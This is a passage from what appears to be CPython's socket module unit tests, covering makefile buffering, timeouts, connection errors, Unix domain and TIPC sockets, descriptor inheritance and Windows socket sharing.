self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(socket.timeout, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
if hasattr(errno, 'EADDRNOTAVAIL'):
# bpo-31910: socket.create_connection() fails randomly
# with EADDRNOTAVAIL on Travis CI
expected_errnos.append(errno.EADDRNOTAVAIL)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
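# Illustrative sketch (not part of the test suite): create_connection() walks
# every address returned by getaddrinfo() and re-raises the last failure, so
# callers catch OSError and inspect errno much as the tests above do, while
# timeouts propagate as socket.timeout rather than being recast as generic
# errors.
def _create_connection_sketch(host, port, timeout=5):
    try:
        return socket.create_connection((host, port), timeout=timeout)
    except socket.timeout:
        return "timed out"
    except OSError as exc:
        # errno reflects the failure of the last address attempted.
        return exc.errno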
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
support.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
        # It's ok if the file does not exist, is a directory, or if we
        # don't have permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
